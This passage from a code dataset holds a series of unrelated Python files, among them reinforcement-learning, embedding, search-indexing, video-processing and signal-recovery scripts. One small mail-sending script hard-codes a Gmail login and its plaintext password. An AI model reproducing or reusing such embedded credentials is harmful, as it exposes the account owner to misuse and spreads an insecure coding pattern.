dtype=np.float64)\n\n dist = GaussianDiagonalLogStdParametrization(init_loc=init_loc, init_std=init_std)\n # dist = GaussianDiagonal(init_loc=init_loc, init_std=init_std)\n\n # Policy\n policy_hparam = dict(\n ref_energy=init_loc[0],\n energy_gain=init_loc[1],\n # energy_th_gain=0.3, # This parameter is fixed.\n energy_th_gain=init_loc[2], # This parameter is fixed.\n acc_max=5.,\n alpha_max_pd_enable=10.,\n pd_gains=to.tensor([-1.7313308, 35.976177, -1.58682, 3.0102878], dtype=to.float64)\n )\n policy = QQubeSwingUpAndBalanceCtrl(env.spec, **policy_hparam, only_swingup_control=True)\n\n # Set the policy parameters to the initial ones...\n policy.param_values = to.tensor(init_loc)\n\n # Algorithm\n algo_hparam = dict(\n 
max_iter=50,\n        pop_size=1,\n        num_rollouts=1,\n        expl_std_init=1.0,\n        expl_std_min=0.0,\n        num_sampler_envs=16,\n        n_mc_samples_gradient=1,\n        coupling=True,\n        lr=1e-1,\n        optim='Adam'\n    )\n\n\n    algo = EMVD(ex_dir, env, policy, dist, **algo_hparam)\n\n    # Save the hyper-parameters\n    save_list_of_dicts_to_yaml([\n        dict(env=env_hparams, seed=ex_dir.seed),\n        dict(policy=policy_hparam),\n        dict(algo=algo_hparam, algo_name=algo.name)],\n        ex_dir\n    )\n\n    # Jeeeha\n    algo.train(seed=ex_dir.seed, snapshot_mode='best')\n","sub_path":"Pyrado/scripts/training/qq-swing_mvd.py","file_name":"qq-swing_mvd.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"286412967","text":"from django.core.management.base import BaseCommand, CommandError\nfrom corehq.apps.users.models import CouchUser\n\n\nclass Command(BaseCommand):\n    help = \"Syncs the users in a domain from CouchDB to PostgreSQL.\"\n    args = ''\n\n    def handle(self, *args, **options):\n        if len(args) != 1:\n            raise CommandError('Usage is sync_couch_users_to_sql %s' % self.args)\n\n        domain = args[0].strip()\n\n        users = CouchUser.by_domain(domain)\n        for user in users:\n            user.save()\n","sub_path":"corehq/apps/domainsync/management/commands/sync_couch_users_to_sql.py","file_name":"sync_couch_users_to_sql.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"473707365","text":"import ontquery as oq\nfrom pyontutils.core import OntTerm\nimport os\n\ndef remote(server=''):\n\n    # Request interlex remote (scigraph is also an option for plugins)\n    InterLexRemote = oq.plugin.get('InterLex')\n\n    if server:\n        server = server if server.endswith('.') else server + '.'\n    # build the endpoint unconditionally so the default (no server prefix) also works\n    endpoint = f'https://{server}scicrunch.org/api/1/'\n\n    #\n    interlex_remote = InterLexRemote()\n\n    # setup inheritance classes\n    interlex_remote.apiEndpoint = endpoint\n    interlex_remote.setup(instrumented=OntTerm)\n\n    return interlex_remote\n","sub_path":"ilxutils/ilxutils/remotes.py","file_name":"remotes.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"342779723","text":"import numpy as np\nfrom .node import Node\n\nclass Forest:\n    def __init__(self, nodes):\n        self.trees = nodes\n    def get_closest_point(self, point, space):\n        closest = self.trees[0]\n        smallest_dist = np.linalg.norm(\n            space.vec(closest.coords, point)\n        )\n        for tree in self.trees:\n            temp = tree.get_closest_point(point, space)\n            if temp[1] < smallest_dist:\n                closest = temp[0]\n                smallest_dist = temp[1]\n        return(closest, smallest_dist)\n    def get_all_children(self):\n        all_children = []\n        for tree in self.trees:\n            all_children.extend(tree.get_all_children())\n        return(all_children)\n    def grow(self, bo, eps, max_e, space):\n        boundlength = space.bounds[1,:] - space.bounds[0,:]\n        dim = bo.dim\n        new_point = np.random.random(dim) * boundlength + space.bounds[0,:]\n        new_e = bo.get_mu(np.vstack(np.atleast_2d(new_point)))[0,0]\n        if new_e < max_e:\n            closest, dist = self.get_closest_point(new_point, space)\n            new_point = space.trace(closest.coords, new_point, bo, eps, max_e)\n            if not np.prod(new_point == closest.coords):\n                closest.children.append(Node(new_point, closest))\n    def get_random_child(self):\n        all_children = self.get_all_children()\n        return(np.random.choice(all_children, size=1)[0])\n    def merge(self, other_forest):\n        for tree in other_forest.trees:\n            
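            # fold every tree of the other forest into this forest's list of root trees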
self.trees.append(tree)\n def test_connectivity_once(self, forest_B, bo, space, eps, max_e):\n random_A = self.get_random_child()\n closest_B, dist = forest_B.get_closest_point(random_A.coords, space)\n endpoint = space.trace(random_A.coords, closest_B.coords, bo,\n eps, max_e)\n if np.prod(endpoint == closest_B.coords):\n return([random_A, closest_B])\n else:\n return(None)\n\n","sub_path":"boss/mep/forest.py","file_name":"forest.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484768322","text":"from engine import *\nimport tensorflow as tf\nfrom tensorflow import keras\n#from keras.models import Model\n#from keras.layers import Dense, Dropout\n\n#from keras.applications.mobilenet import MobileNet\n#from keras.applications.mobilenet import preprocess_input as preprocess_input_mob\n\nfrom utils.score_utils import mean_score, std_score\n\n\n# Example:\n# fitness function for nima classifier\ndef nima_classifier(**kwargs):\n # read parameters\n population = kwargs.get('population')\n generation = kwargs.get('generation')\n tensors = kwargs.get('tensors')\n f_path = kwargs.get('f_path')\n objective = kwargs.get('objective')\n _resolution = kwargs.get('resolution')\n _stf = kwargs.get('stf')\n \n images = True\n\n \n\n fn = f_path + \"gen\" + str(generation).zfill(5)\n fitness = []\n best_ind = 0\n\n # set objective function according to min/max\n fit = 0\n if objective == 'minimizing':\n condition = lambda: (fit < max_fit) # minimizing\n max_fit = float('inf')\n else:\n condition = lambda: (fit > max_fit) # maximizing\n max_fit = float('-inf')\n\n\n number_tensors = len(tensors)\n with tf.device('/CPU:0'):\n\n # NIMA classifier\n x = np.stack([tensors[index].numpy() for index in range(number_tensors)], axis = 0)\n #x = keras.applications.mobilenet.preprocess_input_mob(x)\n x = keras.applications.mobilenet.preprocess_input(x)\n scores = model.predict(x, batch_size = number_tensors, verbose=0)\n #scores = model.predict()\n \n # scores\n for index in range(number_tensors):\n\n if generation % _stf == 0:\n save_image(tensors[index], index, fn) # save image\n\n mean = mean_score(scores[index])\n std = std_score(scores[index])\n # fit = mean - std\n fit = mean\n\n if condition():\n max_fit = fit\n best_ind = index\n fitness.append(fit)\n population[index]['fitness'] = fit\n\n # save best indiv\n if images:\n save_image(tensors[best_ind], best_ind, fn, addon='_best')\n return population, population[best_ind]\n\n\nif __name__ == \"__main__\":\n\n # GP params\n seed = random.randint(0, 2147483647)\n resolution = [128, 128, 3]\n dev = '/gpu:0' # device to run, write '/cpu_0' to tun on cpu\n number_generations = 20\n\n # build function and terminal sets according to resolution\n dim = len(resolution)\n build_function_set(function_set)\n build_terminal_set(dim, resolution, dev)\n\n # NIMA example\n base_model = keras.applications.MobileNet((None, None, 3), alpha=1, include_top=False, pooling='avg', weights=None)\n x = keras.layers.Dropout(0.75)(base_model.output)\n x = keras.layers.Dense(10, activation='softmax')(x)\n model = keras.models.Model(base_model.input, x)\n model.load_weights('weights/weights_mobilenet_aesthetic_0.07.hdf5')\n\n\n # create engine\n engine = Engine(fitness_func = nima_classifier,\n population_size = 30,\n tournament_size = 3,\n mutation_rate = 0.1,\n crossover_rate = 0.9,\n max_tree_depth = 20,\n target_dims=resolution,\n method='ramped half-and-half',\n objective='maximizing',\n 
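                    # run settings below: stop once `number_generations` generations have elapsed; save_to_file=10 presumably writes results to disk every 10 generations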
device=dev,\n stop_criteria='generation',\n stop_value=number_generations,\n immigration=10000,\n seed = seed,\n debug=0,\n save_to_file=10,\n save_graphics=True,\n show_graphics=False,\n read_init_pop_from_file=None)\n # run evolutionary process\n engine.run()\n\n # A file can be loaded by specifing the \"read_init_pop_from_file\" variable:\n # read_init_pop_from_file = 'population_example.txt'\n","sub_path":"TensorGP-master/Old_scripts/nima_example.py","file_name":"nima_example.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241509604","text":"# from neo4jrestclient.client import GraphDatabase\n# import json\nimport sqlite3\nfrom sqlite3 import Error\n\n#\n# def populate_dataset(intent,l_item,l_query):\n# conn = sqlite3.connect('tags.db')\n# c = conn.cursor()\n# c.execute('''Create TABLE if not exists tag_data (intent TEXT,tag TEXT,query TEXT)''')\n# for tag,query in zip(l_item,l_query):\n#\n# if query!=[]:\n# c.execute(\"INSERT INTO tag_data VALUES(?,?,?)\", (intent,tag,query))\n# else:\n# print(\"iam tag\",tag)\n# continue\n# conn.commit()\n# conn.close()\n# return 0\n#\n# def prepare_query(intent):\n# #q = 'match(n:{}) -[r:invokes]->(m) Return n,r,m'.format(intent)\n# q='MATCH (n:{})-[r:invokes]->(m) RETURN n.intent,m.intent'.format(intent)\n# return q\n#\n# def tag_generate(intent):\n# tags=[]\n# n=0\n#\n# db = GraphDatabase(\"http://localhost:7474\", username=\"neo4j\", password=\"subodh\")\n# results = db.query(prepare_query(intent))\n# for r in results:\n# tags.append(r[1])\n# return tags\n#\n#\n#\n# def prepare_tags():\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n#\n# for item in dictionary_item:\n# tags=tag_generate(item[\"intent\"])\n# possible_query=generate_query(tags)\n# print(tags,possible_query)\n#\n# populate_dataset(item[\"intent\"],tags,possible_query)\n# return 0\n#\n# def generate_query(tags):\n# possible_query=[]\n# list_item=[]\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n# for item in dictionary_item:\n# list_item.append(item[\"intent\"])\n#\n# for tag in tags:\n# for item in dictionary_item:\n# if tag==item[\"intent\"] and tag in list_item:\n# print(\"how are you?\")\n# possible_query.append(item[\"query\"][0])\n#\n# elif tag not in list_item:\n# possible_query.append('')\n# break\n#\n#\n#\n# return possible_query\n\n\ndef generate_possible_query(intent):\n possible_query=[]\n print(intent)\n default_list=['About Ashley','Her Contacts']\n\n conn = sqlite3.connect('chat/chatModel/tags.db')\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM tag_data WHERE intent=?\", (intent,))\n\n rows = cur.fetchall()\n\n\n for row in rows:\n possible_query.append(row[2])\n print(\"iam the possible query\",possible_query)\n if possible_query==[]:\n\n print(\"iam possible_qureey inside\")\n return default_list\n else:\n print(\"iam here man\")\n return possible_query\n\n\n# generate_query(['subodh'])\n# generate_query(['her_offer'])\n# #prepare_tags()\n# import json\n# def prepare_tags():\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n# print(dictionary_item)\n# for item in dictionary_item:\n# 
print(item[\"intent\"])\n\n#prepare_tags()\n\n\n","sub_path":"chat/chatModel/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392462212","text":"import numpy as np\nimport theano\nimport theano.tensor as tensor\nfrom theano import config\n\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\nfrom collections import OrderedDict\n#from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\n#from utils import dropout, numpy_floatX\nfrom utils import uniform_weight, zero_bias\n\nfrom gru_layers_modify_sep_10 import param_init_decoder_modify_sep_10, decoder_layer_modify_sep_10\n\nimport pdb\n\ntrng = RandomStreams(123)\n\n# Set the random number generators' seeds for consistency\nSEED = 123 \nnp.random.seed(SEED)\n\ndef v_dk(beta):\n betas = np.array([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])\n vs = np.array([-.33, -.472, -.631, -.792, -.953, -1.11, -1.29, -1.49, -1.74, -2.10, -10])\n from scipy.interpolate import interp1d\n return interp1d(betas, vs)(beta)\n\n\"\"\" init. parameters. \"\"\" \ndef init_params_modify_sep_10(options, beta):\n# changed \n n_x = options['n_x'] \n n_h = options['n_h']\n \n params = OrderedDict()\n params = param_init_decoder_modify_sep_10(beta, options,params)\n \n Vhid = uniform_weight(n_h,n_x)\n Vhid_combined = np.zeros([2]+list(Vhid.shape))\n Vhid_combined[0, :] = Vhid\n #Vhid_combined[1, :] = np.random.randn(np.product(Vhid.shape)).reshape(Vhid.shape) * .001\n Vhid_combined[1, :] = v_dk(beta)\n params['Vhid'] = Vhid_combined\n \n bhid = zero_bias(n_x)\n bhid_combined = np.zeros([2]+list(bhid.shape))\n bhid_combined[0, :] = bhid\n #bhid_combined[1, :] = np.random.randn(np.product(bhid.shape)).reshape(bhid.shape) * .001\n bhid_combined[1, :] = v_dk(beta)\n params['bhid'] = bhid_combined \n\n return params\n\ndef init_tparams(params):\n# no change\n tparams = OrderedDict()\n for kk, pp in params.iteritems():\n tparams[kk] = theano.shared(params[kk], name=kk)\n return tparams\n \n\"\"\" Building model... 
\"\"\"\n'''\ndef sample(mu, sig):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n #sig = 10 ** nu\n return r * sig + mu\n'''\ndef sample(mu, nu):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n sig = 10 ** nu\n return r * sig + mu\n\ndef build_model_modify_sep_10(tparams,options):\n \n #trng = RandomStreams(SEED)\n \n # Used for dropout.\n #use_noise = theano.shared(numpy_floatX(0.))\n\n # x: n_steps * n_x\n x = tensor.matrix('x', dtype=config.floatX) \n n_steps = x.shape[0] \n \n h_decoder = decoder_layer_modify_sep_10(tparams, x)\n \n #h_decoder_printed = theano.printing.Print('h_decoder: ')(h_decoder)\n \n ###############################################################################\n '''\n def sample(mu, nu):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n sig = 10 ** nu\n return r * sig + mu\n '''\n #def sample(mu, nu):\n\n tparams_Vhid = sample(tparams['Vhid'][0], tparams['Vhid'][1])\n tparams_bhid = sample(tparams['bhid'][0], tparams['bhid'][1])\n #pdb.set_trace()\n ############################################################################### \n \n #pred = tensor.nnet.sigmoid(tensor.dot(h_decoder,tparams['Vhid']) + tparams['bhid'])\n pred = tensor.nnet.sigmoid(tensor.dot(h_decoder,tparams_Vhid) + tparams_bhid)\n \n #pred = theano.printing.Print('pred: ')(pred)\n #pdb.set_trace()\n f_pred = theano.function([x], pred)\n #pdb.set_trace()\n \n cost = tensor.sum(tensor.nnet.binary_crossentropy(pred, x))/n_steps \n\n return x, f_pred, cost\n","sub_path":"rnn_music/model/gru_model_modify_sep_10.py","file_name":"gru_model_modify_sep_10.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576541461","text":"import os\nimport subprocess\nfrom typing import List\n\nimport config\nimport entities.graphs.graph as g\nimport memory_access.memory_access as ma\nimport entities.embeddings.embedding as emb\nimport gensim\n\n\nclass Line(emb.Embedding):\n\n def __init__(self, dim: int = 128, threshold: int = 1000, depth: int = 2):\n assert (dim % 2 == 0) # will be devided by 2\n self.dim: int = dim # 2 embeddings will be created and added together each emb has size dim\n self.threshold = threshold\n self.depth = depth\n\n def __str__(self):\n return f'LINE-dim={self.dim}_depth={self.depth}_threshold={self.threshold}'\n\n def short_name(self) -> str:\n return \"LINE\"\n\n def train_embedding(self, graph: g.Graph, memory_access: ma.MemoryAccess, removed_nodes: [int]):\n super().train_embedding(graph=graph, memory_access=memory_access, removed_nodes=removed_nodes)\n\n if memory_access.has_embedding(emb_func_name=str(self), graph_name=str(graph), removed_nodes=removed_nodes):\n # embedding is already trained\n return\n\n dense_edge_list = self.__get_preprocessed_edge_list(removed_nodes=removed_nodes, graph=graph,\n mem_acc=memory_access)\n\n target_emb_path_file = self.__train_embedding(dense_edge_list_file_path=dense_edge_list,\n mem_acc=memory_access, removed_nodes=removed_nodes, graph=graph)\n os.remove(dense_edge_list)\n\n self.__change_embedding_emb_format_to_csv(target_emb_path_file=target_emb_path_file, graph=graph,\n removed_nodes=removed_nodes, mem_acc=memory_access)\n\n def __change_embedding_emb_format_to_csv(self, target_emb_path_file: str, graph: g.Graph, removed_nodes: List[int],\n mem_acc: ma.MemoryAccess):\n assert (target_emb_path_file.endswith(\".emb\"))\n 
model = gensim.models.keyedvectors.KeyedVectors.load_word2vec_format(target_emb_path_file, binary=True)\n mem_acc.save_gensim_embedding(trained_emb=model, emb_func_name=str(self), graph_name=str(graph),\n removed_nodes=removed_nodes, graph_nodes=graph.nodes())\n os.remove(target_emb_path_file)\n\n @staticmethod\n def __get_preprocessed_edge_list(graph: g.Graph, mem_acc: ma.MemoryAccess, removed_nodes: [int]) -> str:\n edge_list_file_path = mem_acc.access_edge_list_file_path(graph_name=str(graph), removed_nodes=removed_nodes,\n edge_list=graph.edges())\n\n path_name = os.path.splitext(edge_list_file_path)[0]\n directed_weighted_edge_list = path_name + \".directedWeightedEdgelist\"\n dense_edge_list = path_name + \".denseEdgelist\"\n\n if os.path.exists(dense_edge_list):\n print(\"dense edge list already exists\")\n return dense_edge_list\n\n if not os.path.exists(edge_list_file_path):\n raise ValueError(f\"Edge list does not exist: {edge_list_file_path}\")\n\n working_dir = os.getcwd()\n os.chdir(config.LINE_DIR)\n subprocess.call(f'python preprocess_youtube.py \"{edge_list_file_path}\" \"{directed_weighted_edge_list}\"',\n shell=True)\n\n if not os.path.exists(directed_weighted_edge_list):\n raise ValueError(f\"Directed weighted edge list could not be computed. Target file: {edge_list_file_path}\")\n\n subprocess.call(\n f'./reconstruct -train \"{directed_weighted_edge_list}\" -output \"{dense_edge_list}\" '\n f'-depth 2 -threshold 1000',\n shell=True)\n os.chdir(working_dir)\n os.remove(directed_weighted_edge_list)\n\n if not os.path.exists(dense_edge_list):\n raise ValueError(f\"Dense edge list could not be computed. Target file {dense_edge_list}\")\n\n return dense_edge_list\n\n def __train_embedding(self, dense_edge_list_file_path: str, graph: g.Graph, mem_acc: ma.MemoryAccess,\n removed_nodes: List[int]) -> str:\n target_file_path = mem_acc.get_embedding_path_name(emb_func_name=str(self), graph_name=str(graph),\n removed_nodes=removed_nodes)\n\n target_emb_path_file = target_file_path + \".emb\"\n\n first_order_emb = target_file_path + \"_order_1.emb\"\n second_order_emb = target_file_path + \"_order_2.emb\"\n norm_first_order_emb = target_file_path + \"_order_1_normalised.emb\"\n norm_second_order_emb = target_file_path + \"_order_2_normalised.emb\"\n\n # execute embedding\n working_dir = os.getcwd()\n os.chdir(config.LINE_DIR)\n assert (os.path.exists(dense_edge_list_file_path))\n\n subprocess.call(\n f'./line -train \"{dense_edge_list_file_path}\" -output \"{first_order_emb}\" -size \\\n {str(self.dim / 2)} -order 1 -binary 1 -threads {config.NUM_CORES}',\n shell=True)\n subprocess.call(\n f'./line -train \"{dense_edge_list_file_path}\" -output \"{second_order_emb}\" -size \\\n {str(self.dim / 2)} -order 2 -binary 1 -threads {config.NUM_CORES}',\n shell=True)\n subprocess.call(f'./normalize -input \"{first_order_emb}\" -output \"{norm_first_order_emb}\" -binary 1',\n shell=True)\n subprocess.call(f'./normalize -input \"{second_order_emb}\" -output \"{norm_second_order_emb}\" -binary 1',\n shell=True)\n subprocess.call(\n f'./concatenate -input1 \"{norm_first_order_emb}\" -input2 \"{norm_second_order_emb}\" '\n f'-output \"{target_emb_path_file}\" -binary 1',\n shell=True)\n os.chdir(working_dir)\n\n assert (os.path.exists(target_emb_path_file))\n\n # remove unnecessary files to save memory\n os.remove(first_order_emb)\n os.remove(second_order_emb)\n os.remove(norm_first_order_emb)\n os.remove(norm_second_order_emb)\n\n return 
target_emb_path_file\n","sub_path":"main/entities/embeddings/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"593158050","text":"from smtplib import *\nimport smtplib\ndef send_mail_to(rcpt,msg):\n\tserver = smtplib.SMTP()\n\tprint (\"Defined server\")\n\tserver.connect(\"smtp.gmail.com\",587) # connecting to gmail smtp server.\n\tprint (\"Connected\")\n\tserver.ehlo()\t\n\tserver.starttls()\t#Starting tls security \n\tserver.ehlo()\t\n\tserver.login(\"e.complaint.NIT@gmail.com\",'123@qwerty') #will login to account\n\tprint (\"Logged in\")\n\tserver.sendmail('e.complaint.NIT@gmail.com',rcpt,msg) # will send the message\n\tprint(\"Sent\")\n\tserver.quit()","sub_path":"complaint/send_mail_to_reciept.py","file_name":"send_mail_to_reciept.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"353990980","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/strona_a')\ndef strona_a():\n    return render_template('index3a.html')\n\n\n@app.route('/strona_b')\ndef strona_b():\n    wpis = request.args.get('wpis')\n    if wpis:\n        print(wpis)\n    return render_template('index3b.html')\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"Python - advanced/zajecia06/template3.py","file_name":"template3.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"453422182","text":"import pickle\nimport math\nimport numpy as np\nfrom nltk.corpus import wordnet\n# DO NOT MODIFY CLASS NAME\nclass Indexer:\n    # DO NOT MODIFY THIS SIGNATURE\n    # You can change the internal implementation as you see fit.\n    def __init__(self, config):\n        self.inverted_idx = {}\n        self.postingDict = {}\n        self.docs_index = {}\n        self.config = config\n        self.flag = \"\"\n\n\n    # DO NOT MODIFY THIS SIGNATURE\n    # You can change the internal implementation as you see fit.\n    def add_new_doc(self, document):\n        \"\"\"\n        This function performs the indexing process for a document object.\n        Saved information is captured via two dictionaries ('inverted index' and 'posting')\n        :param document: a document that needs to be indexed.\n        :return: -\n        \"\"\"\n\n        document_dictionary = document.term_doc_dictionary\n        maximum = 0\n        if len(document_dictionary) > 0:\n            maximum = max(document_dictionary.values())\n        self.docs_index[int(document.tweet_id)] = [maximum,len(document_dictionary),document.tokenized_text,0]\n        # Go over each term in the doc\n        for term in document_dictionary.keys():\n            try:\n                # Update inverted index and posting\n                try:\n                    tf = document_dictionary[term]\n                except:\n                    tf = 0\n                if term not in self.inverted_idx.keys():\n                    self.inverted_idx[term] = [1, document_dictionary[term]]\n                    self.postingDict[term] = [[int(document.tweet_id),document_dictionary[term]]]#{int(document.tweet_id):[\n                else:\n                    self.inverted_idx[term][0] += 1\n                    self.inverted_idx[term][1] += document_dictionary[term]\n                    self.postingDict[term].append([int(document.tweet_id),document_dictionary[term]])\n\n                #self.postingDict[term].append((document.tweet_id, document_dictionary[term]))\n\n            except:\n                print(term)\n                print('problem with the following key {}'.format(term[0]))\n\n    # DO NOT MODIFY THIS SIGNATURE\n    # You can change the internal implementation as you see fit.\n    def load_index(self, fn):\n        \"\"\"\n        Loads a pre-computed 
index (or indices) so we can answer queries.\n        Input:\n            fn - file name of pickled index.\n        \"\"\"\n        f = open(fn, \"rb\")\n        lst = pickle.load(f)\n        return lst\n\n\n    # DO NOT MODIFY THIS SIGNATURE\n    # You can change the internal implementation as you see fit.\n    def save_index(self, fn):\n        \"\"\"\n        Saves a pre-computed index (or indices) so we can save our work.\n        Input:\n              fn - file name of pickled index.\n        \"\"\"\n\n        new_docs = {}\n        for doc in self.docs_index:\n            new_docs[doc] = self.docs_index[doc][:4]\n        f = open(fn, \"wb\")\n        pickle.dump([self.inverted_idx,self.postingDict,new_docs],f)\n\n    # feel free to change the signature and/or implementation of this function\n    # or drop altogether.\n    def _is_term_exist(self, term):\n        \"\"\"\n        Checks if a term exists in the dictionary.\n        \"\"\"\n        return term in self.postingDict\n\n    # feel free to change the signature and/or implementation of this function \n    # or drop altogether.\n    def get_term_posting_list(self, term):\n        \"\"\"\n        Return the posting list from the index for a term.\n        \"\"\"\n        return self.postingDict[term] if self._is_term_exist(term) else []\n\n\n\n    def optimize(self):\n        \"\"\"\n        remove words that are too rare from the inverted index\n        :return:\n        \"\"\"\n        new_dict = {}\n        for key in self.inverted_idx:\n            if self.inverted_idx[key][1] > 10 and self.inverted_idx[key][0] > 10:\n                new_dict[key] = self.inverted_idx[key]\n        self.inverted_idx = new_dict\n\n    def calculate_weigths(self):\n        \"\"\"\n        calculate the weight of terms in a sentence according to BM-25\n        :return:\n        \"\"\"\n        sum_len = 0\n        for i in self.docs_index:\n            sum_len += len(self.docs_index[i][2])\n        avg = sum_len/len(self.docs_index)\n        k = 1.2\n        b = 0.1\n        for term in self.inverted_idx:\n            idf = math.log(len(self.docs_index) / self.inverted_idx[term][0], 2)\n            for doc in self.postingDict[term]:\n                doc_len = len(self.docs_index[doc[0]][2])\n                norm = 1 - b + b*(doc_len/avg)\n                w = idf * (((k+1)*doc[1])/(k*norm+doc[1]))\n                doc.append(w)\n                self.docs_index[doc[0]][3] += (w**2)\n\n\n    def calculate_average_vector(self,model):\n        \"\"\"\n        calculates the average vector of each doc using the word2vec model\n        :param model:\n        :return:\n        \"\"\"\n        for doc in self.docs_index:\n            vec = []\n            for term in self.docs_index[doc][2]:\n                try:\n                    vec.append(model.wv[term])\n                except:\n                    continue\n            if len(vec) == 0:\n                vec = []\n            vec = np.add.reduce(vec)\n            vec /= len(self.docs_index[doc][2])\n            self.docs_index[doc][2] = vec\n\n\n    def get_syns(self):\n        \"\"\"\n        get the synonyms of each word using the wordnet model\n        :return:\n        \"\"\"\n        for doc in self.docs_index:\n            syns = []\n            text = self.docs_index[doc][2]\n            for word in text:\n                w = wordnet.synsets(word)\n                if len(w) > 0:\n                    syns.append(wordnet.synsets(word)[0])\n            self.docs_index[doc].append(syns)\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"116380075","text":"\"\"\" This module receives an mp4 file in the same directory as input\n    output will be a folder of extracted frames and a wav file for audio\n    that has the same name as the input\n    Input: video name that is in the same directory\n    Output: exported WAV file and a folder of image frames\"\"\"\n\nimport os\nimport moviepy.editor as mp\nimport cv2\n\n\ndef video_input(name):\n    \"\"\"Extract audio file and image frames from user video\"\"\"\n    # make sure that the file exists\n    try:\n        test = open(name + \".mp4\")\n    except IOError:\n        print(\"File not accessible\")\n    else:\n        test.close()\n\n    # 
Extract the audio into wav file\n audio = mp.AudioFileClip(name + \".mp4\")\n audio.write_audiofile('./userData/' + name + \".wav\")\n\n # Create a VideoCapture object\n cam = cv2.VideoCapture(name + \".mp4\")\n\n try:\n # creating a folder named data\n if not os.path.exists(\"userData/frames\"):\n os.makedirs(\"userData/frames\")\n\n # if not created then raise error\n except OSError:\n print('Error: Creating directory of frames')\n\n # Check if camera opened successfully\n if cam.isOpened() is False:\n print(\"Unable to read camera feed\")\n\n # frame\n current_frame = 0\n while True:\n\n # reading from frame\n ret, frame = cam.read()\n\n if ret:\n # if video is still left continue creating images\n frame_name = './' + 'userData/frames' + '/frame' + str(current_frame) + '.jpg'\n # print('Creating...' + frameName)\n\n # writing the extracted images\n cv2.imwrite(frame_name, frame)\n\n # increasing counter so that it will\n # show how many frames are created\n current_frame += 1\n else:\n break\n\n # When everything done, release the video capture and video write objects\n # cam.release()\n\n # Closes all the frames\n cv2.destroyAllWindows()\n","sub_path":"Felinemotion/video_input.py","file_name":"video_input.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52608860","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# import simu.deconv as simu\nimport simu.doa as simu\nimport fcts.lasso as lasso\nimport fcts.blasso as blasso\n\n\nM = 101\nN = 50\nK = 5\nSNR=np.inf\nlambda_lambdaMax = .1\n\nnp.random.seed(1)\n\n(theta_y,x_y,y) = simu.signal(K,M,SNR)\n\ntheta_A = simu.grid(N)\nA = simu.atoms(theta_A,M)\n\nlambdaMax = np.linalg.norm(A.T@y,np.inf)\n\nlambda_ = lambda_lambdaMax*lambdaMax\nL = np.linalg.eigvals(A.T.conj()@A)\nL = np.max(L)\n\nxinit = np.zeros((N,1))\nmaxIter = 200\ntol = 1.e-6\ndisp = True\n\n\n'''\nFista\n'''\nx_lasso = lasso.fista( y , A , xinit , lambda_ , L , maxIter , tol , disp )\n\n\n'''\nFW-blasso\n'''\n(param_FW_blasso, x_FW_blasso) = blasso.FW( y , A , theta_A , lambda a:simu.atoms(a,M) , simu.Bounds().T , lambda_ , maxIter , tol , disp )\n\n\n\n'''\nSFW-blasso\n'''\n(param_SFW_blasso, x_SFW_blasso) = blasso.SFW( y , A , theta_A , lambda a:simu.atoms(a,M) , simu.Bounds().T , lambda_ , maxIter , tol , disp )\n\n\nplt.figure()\n\nplt.plot(theta_y.T,np.abs(x_y),'x')\nplt.plot(theta_A.T,np.abs(x_lasso))\nplt.plot(param_FW_blasso.T,np.abs(x_FW_blasso),'o')\nplt.plot(param_SFW_blasso.T,np.abs(x_SFW_blasso),'o')\nplt.legend(('GT','fista','FW','SFW'))\nplt.show()\n","sub_path":"blasso-master/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191827582","text":"import rospy\nfrom sensor_msgs.msg import Joy\nfrom geometry_msgs.msg import Twist, PoseStamped, Pose\nimport 